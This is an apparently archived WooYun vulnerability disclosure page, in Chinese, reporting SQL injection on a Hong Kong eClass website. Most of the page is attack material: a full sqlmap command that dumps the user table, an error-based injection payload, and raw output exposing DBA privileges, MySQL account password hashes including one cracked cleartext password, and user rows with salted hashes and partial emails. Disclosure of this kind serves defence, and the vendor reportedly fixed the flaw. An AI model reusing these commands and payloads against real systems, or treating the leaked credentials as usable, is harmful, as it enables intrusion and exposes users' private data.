当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156577

漏洞标题:eClass主站存在SQL注入漏洞(DBA权限+root密码泄露+大量用户密码及个人隐私泄露)(香港地區)

相关厂商:eClass

漏洞作者: 路人甲

提交时间:2015-12-01 11:25

修复时间:2015-12-16 10:03

公开时间:2015-12-16 10:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

網上教學是隨著互聯網科技和新學習概念的發展而衍生的教學範式。在這種環境內,教學範式產生了一個根本的改變──教學模式由「教師為主」轉變為「以學生為中心」;因此,教師由「教授的角色」轉變為「引導者的角色」,學生由「被動的學習者」轉變為「主動的協作學習者」。eClass網上教學系統正是因應這新教學範式而研發的網上學習管理系統。

详细说明:

地址:http://**.**.**.**/index.php?option=com_content&view=article&id=110&Itemid=244&lang=zh

$ python sqlmap.py -u "http://**.**.**.**/index.php?option=com_content&view=article&id=110&Itemid=244&lang=zh" -p id --technique=E --random-agent --batch  -D bldev1_joomla -T jos_users -C username,password,email,name --dump --start 1 --stop 10


| jos_users                             | 1246    |


Database: bldev1_joomla
Table: jos_users
[10 entries]
+--------------+-------------------------------------------------------------------+--------------------------------+----------------------------------------------------------------------------------------------------------+
| username     | password                                                          | email                          | name                                                                                                     |
+--------------+-------------------------------------------------------------------+--------------------------------+----------------------------------------------------------------------------------------------------------+
| zreqvaxfwcsd | 8ab07e8e83141c7d4ae16a2e4fb4eca0:mxV6reAvgiM2DMLfubCpYrzUPCdh86ym | zreqvaxfwcsd@**.**.**.** | 2012 spy phone report, eye spy phone app                                                                 |
| eqascwdvrfzx | ba22ceecc64b376a4b8d75adf9574dda:V0fo9dq1xFF9YK7cWklcZ0JDVqG2NAU3 | eqascwdvrfzx@**.**.**.** | 3                                                                                                        |
| zdaqxevfwrsc | 536c375f37e85b691d999f9ca8c88f18:0dshmacHexTQvGM3HiyJo7BW6HY1Jk03 | zdaqxevfwrsc@**.**.**.** | 3                                                                                                        |
| qafxcrdzevws | b58afb98bb94616a5e0b3ed2f2731fea:f4fpq4JZhZXdK8jYSoIHSp52rw1j69k0 | qafxcrdzevws@**.**.**.** | 3                                                                                                        |
| rxfdwcqvzaes | 471921421a32d73536efefcbcccf2c40:g7RE79PIIClc2I5hKa8v8NtJNuoOIoMy | rxfdwcqvzaes@mailer.sixth.biz  | 3Д                                                                                                       |
| sqrczvfdexaw | 389a2643cb450e0d00b3c73ab5bc3b31:vp93je7Awjn59KhRwL3Xl3D4X8k0jEZV | sqrczvfdexaw@mailer.sixth.biz  | 3Д                                                                                                       |
| fwdcqxzsvrae | 7ea555578fdce95faa30f1aa4dc0e04d:TzJJHUKe2wulHw2o093VSz650d6PUudC | fwdcqxzsvrae@mailer.sixth.biz  | 3Д                                                                                                       |
| dvcrwezfaxqs | 3592b5a466bfea65b0270d22bae0fb67:bcKt0XOtFOMkYoR4LdmRNRrm3GQ9vy1f | dvcrwezfaxqs@**.**.**.** | A writing paper - writing a good paper                                                                   |
| aB2kO3vA6m   | aeb6e0c06c65025bdbe0d4281bc741e5:XTkxCfPrXz33tcNhOjl07ArazpnWqYFj | qygikervnu@**.**.**.**           | aB2kO3vA6m                                                                                               |
| ewcdxvzaqsfr | 4f9eabcd5629fe5aa387916d4abd8a1d:y7436toNH9VSbp3hImzgDbK4BNK8B09b | ewcdxvzaqsfr@**.**.**.** | Achat Cialis 10/20/40/60 mg. en pharmacie pas cher Mastercard - Commander Cialis en pharmacie moins cher |
+--------------+-------------------------------------------------------------------+--------------------------------+----------------------------------------------------------------------------------------------------------+

漏洞证明:

---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=110 AND (SELECT 1887 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT (ELT(1887=1887,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=244&lang=zh
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
current user:    'bldev1@localhost'
current user is DBA:    True
database management system users [8]:
[*] ''@'**.**.**.**'
[*] ''@'localhost'
[*] 'bldev1'@'localhost'
[*] 'extmail'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'webman'@'localhost'
database management system users password hashes:
[*] bldev1 [1]:
    password hash: NULL
[*] extmail [1]:
    password hash: 1cc88c9e31477cf2
[*] root [2]:
    password hash: 75b22b6400ee6501
    password hash: 7d0e895f7ea6989e
[*] webman [1]:
    password hash: 1a197db46f30ed43
    clear-text password: webman
Database: bldev1_joomla
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| jos_news_event_reg                    | 6147    |
| jos_users                             | 1246    |
| jos_core_acl_aro                      | 1244    |
| jos_core_acl_groups_aro_map           | 1244    |
| jos_jf_content                        | 1229    |
| jos_modules_menu                      | 347     |
| jos_content                           | 191     |
| jos_menu                              | 187     |
| jos_news_event_news                   | 164     |
| jos_news_event_upcoming               | 104     |
| jos_client_case                       | 81      |
| jos_components                        | 67      |
| jos_categories                        | 65      |
| jos_modules                           | 65      |
| jos_jce_plugins                       | 57      |
| jos_news_event_post                   | 56      |
| jos_news_event_media                  | 50      |
| jos_plugins                           | 49      |
| jos_stalker_socnets                   | 49      |
| jos_session                           | 41      |
| jos_menu_types                        | 27      |
| jos_sections                          | 16      |
| jos_jf_tableinfo                      | 14      |
| jos_newsfeeds                         | 14      |
| jos_content_frontpage                 | 12      |
| jos_poll_data                         | 12      |
| jos_core_acl_aro_groups               | 11      |
| jos_poll_date                         | 11      |
| jos_banner                            | 8       |
| jos_weblinks                          | 6       |
| jos_stalker                           | 4       |
| jos_eventschedule                     | 3       |
| jos_groups                            | 3       |
| jos_jce_groups                        | 2       |
| jos_languages                         | 2       |
| jos_templates_menu                    | 2       |
| jos_bannerclient                      | 1       |
| jos_contact_details                   | 1       |
| jos_core_acl_aro_sections             | 1       |
| jos_eventlist_categories              | 1       |
| jos_eventlist_events                  | 1       |
| jos_eventlist_settings                | 1       |
| jos_eventlist_venues                  | 1       |
| jos_polls                             | 1       |
+---------------------------------------+---------+
Database: extmail
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| policy                                | 8       |
| mailbox                               | 4       |
| `domain`                              | 2       |
| alias                                 | 1       |
| manager                               | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1066    |
| STATISTICS                            | 194     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| KEY_COLUMN_USAGE                      | 118     |
| USER_PRIVILEGES                       | 104     |
| TABLES                                | 101     |
| TABLE_CONSTRAINTS                     | 86      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 35      |
| SCHEMATA                              | 5       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 848     |
| help_topic                            | 487     |
| help_keyword                          | 404     |
| help_category                         | 37      |
| `user`                                | 8       |
| db                                    | 5       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: bldev1_joomla
Table: jos_users
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: extmail
Table: policy
[4 columns]
+----------------------+---------+
| Column               | Type    |
+----------------------+---------+
| bypass_banned_checks | char(1) |
| bypass_header_checks | char(1) |
| bypass_spam_checks   | char(1) |
| bypass_virus_checks  | char(1) |
+----------------------+---------+
Database: extmail
Table: manager
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: extmail
Table: mailbox
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: mysql
Table: user
[1 column]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | char(41) binary |
+----------+-----------------+


---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=110 AND (SELECT 1887 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT (ELT(1887=1887,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=244&lang=zh
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: bldev1_joomla
Table: jos_users
[13 columns]
+---------------+---------------------+
| Column        | Type                |
+---------------+---------------------+
| activation    | varchar(100)        |
| block         | tinyint(4)          |
| email         | varchar(100)        |
| gid           | tinyint(3) unsigned |
| id            | int(11)             |
| lastvisitDate | datetime            |
| name          | varchar(255)        |
| params        | text                |
| password      | varchar(100)        |
| registerDate  | datetime            |
| sendEmail     | tinyint(4)          |
| username      | varchar(150)        |
| usertype      | varchar(25)         |
+---------------+---------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=110 AND (SELECT 1887 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT (ELT(1887=1887,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=244&lang=zh
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: bldev1_joomla
Table: jos_users
[10 entries]
+--------------+-------------------------------------------------------------------+--------------------------------+----------------------------------------------------------------------------------------------------------+
| username     | password                                                          | email                          | name                                                                                                     |
+--------------+-------------------------------------------------------------------+--------------------------------+----------------------------------------------------------------------------------------------------------+
| zreqvaxfwcsd | 8ab07e8e83141c7d4ae16a2e4fb4eca0:mxV6reAvgiM2DMLfubCpYrzUPCdh86ym | zreqvaxfwcsd@**.**.**.** | 2012 spy phone report, eye spy phone app                                                                 |
| eqascwdvrfzx | ba22ceecc64b376a4b8d75adf9574dda:V0fo9dq1xFF9YK7cWklcZ0JDVqG2NAU3 | eqascwdvrfzx@**.**.**.** | 3                                                                                                        |
| zdaqxevfwrsc | 536c375f37e85b691d999f9ca8c88f18:0dshmacHexTQvGM3HiyJo7BW6HY1Jk03 | zdaqxevfwrsc@**.**.**.** | 3                                                                                                        |
| qafxcrdzevws | b58afb98bb94616a5e0b3ed2f2731fea:f4fpq4JZhZXdK8jYSoIHSp52rw1j69k0 | qafxcrdzevws@**.**.**.** | 3                                                                                                        |
| rxfdwcqvzaes | 471921421a32d73536efefcbcccf2c40:g7RE79PIIClc2I5hKa8v8NtJNuoOIoMy | rxfdwcqvzaes@mailer.sixth.biz  | 3Д                                                                                                       |
| sqrczvfdexaw | 389a2643cb450e0d00b3c73ab5bc3b31:vp93je7Awjn59KhRwL3Xl3D4X8k0jEZV | sqrczvfdexaw@mailer.sixth.biz  | 3Д                                                                                                       |
| fwdcqxzsvrae | 7ea555578fdce95faa30f1aa4dc0e04d:TzJJHUKe2wulHw2o093VSz650d6PUudC | fwdcqxzsvrae@mailer.sixth.biz  | 3Д                                                                                                       |
| dvcrwezfaxqs | 3592b5a466bfea65b0270d22bae0fb67:bcKt0XOtFOMkYoR4LdmRNRrm3GQ9vy1f | dvcrwezfaxqs@**.**.**.** | A writing paper - writing a good paper                                                                   |
| aB2kO3vA6m   | aeb6e0c06c65025bdbe0d4281bc741e5:XTkxCfPrXz33tcNhOjl07ArazpnWqYFj | qygikervnu@**.**.**.**           | aB2kO3vA6m                                                                                               |
| ewcdxvzaqsfr | 4f9eabcd5629fe5aa387916d4abd8a1d:y7436toNH9VSbp3hImzgDbK4BNK8B09b | ewcdxvzaqsfr@**.**.**.** | Achat Cialis 10/20/40/60 mg. en pharmacie pas cher Mastercard - Commander Cialis en pharmacie moins cher |
+--------------+-------------------------------------------------------------------+--------------------------------+----------------------------------------------------------------------------------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-01 15:31

厂商回复:

Referred to related parties.

最新状态:

2015-12-16:相關機構回報已修復漏洞

漏洞评价:

评价